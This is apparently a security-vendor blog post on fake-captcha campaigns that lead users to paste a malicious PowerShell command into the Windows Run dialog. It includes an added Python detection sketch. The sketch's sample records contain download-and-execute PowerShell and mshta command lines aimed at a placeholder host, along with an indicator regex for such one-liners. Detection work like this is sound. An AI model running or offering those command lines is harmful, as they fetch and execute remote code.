Recent months have seen the widespread use of an emerging technique that exploits fraudulent captchas to deceive users and induce them to perform actions that lead to malware infections.
Captchas, traditionally used to distinguish bots from humans, are being manipulated to convey malicious commands.
When the user interacts with the compromised captcha, a malicious PowerShell command is automatically copied to the clipboard. Immediately afterwards, a pop-up instructs the user to use the key combination that opens the Windows 'Run' utility, paste the copied command and press 'Enter'. This sequence leads to the execution of a command that downloads and runs malware from a remote server.
The distributed payloads include malware such as LummaC2 and Rhadamanthys, known for their advanced information-stealing capabilities, such as harvesting login credentials and other sensitive data. The malware is equipped with a callback mechanism that notifies the threat actor of a successful infection, allowing them to obtain information about the infected user, such as IP address and location.
This technique, which uses social engineering to manipulate users, has high potential in phishing or malvertising campaigns, given its ability to hide behind an appearance that is legitimate and familiar to users.
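The chain described above leaves a recognisable trace in process-creation telemetry: the interpreter is spawned directly by explorer.exe (the parent of anything launched from the Run dialog) with a download-and-execute command line. The following detection sketch is an added example, not code from the report or from Tinexta Defence; it assumes a simplified `parent|image|commandline` export format and runs over constructed sample records, not real telemetry.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation records (not real telemetry), in an
# assumed "parent|image|commandline" form such as a SIEM export might produce.
SAMPLE_EVENTS = [
    "explorer.exe|powershell.exe|powershell -w hidden -ep bypass -c \"iex (iwr 'http://placeholder.invalid/p')\"",
    "explorer.exe|mshta.exe|mshta http://placeholder.invalid/x.hta",
    "explorer.exe|powershell.exe|powershell -c Get-Date",
    "cmd.exe|powershell.exe|powershell -c \"iex (iwr 'http://placeholder.invalid/p')\"",
    "explorer.exe|notepad.exe|notepad C:\\Users\\u\\notes.txt",
]

# Anything launched from the Run dialog is spawned directly by explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"
# The interpreter the page's technique relies on, plus close cousins (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Substrings typical of download-and-execute one-liners (assumed indicator list).
SUSPICIOUS = re.compile(
    r"(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|"
    r"http://|https://|-enc|-w hidden)", re.I)

@dataclass
class Finding:
    image: str
    reasons: list

def analyze(line):
    """Return a Finding if the record matches the Run-dialog pattern, else None."""
    parent, image, cmdline = line.split("|", 2)
    # Require both the explorer.exe parent and a scripting interpreter as child;
    # a plain interactive PowerShell launched from Run is not enough on its own.
    if parent.lower() != RUN_DIALOG_PARENT or image.lower() not in INTERPRETERS:
        return None
    reasons = sorted({m.lower() for m in SUSPICIOUS.findall(cmdline)})
    if not reasons:
        return None
    return Finding(image=image, reasons=reasons)

def scan(lines):
    """Apply analyze() to every record and keep only the hits."""
    return [f for f in (analyze(l) for l in lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding.image}: {', '.join(finding.reasons)}")
```

In a real deployment the same logic would be fed from Sysmon event 1 or Windows event 4688 fields (ParentImage, Image, CommandLine); the benign `Get-Date` and the cmd.exe-parented record are deliberately included to show that the rule keys on the parent-child pair plus command-line content rather than on PowerShell alone.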
If you wish to learn more, here is the link to our full report.
In addition, you can subscribe to the dedicated Cyber Studios mailing list by Tinexta Defence to receive updates on upcoming research: https://tinextadefence.it/mailing-list-cyber-studios/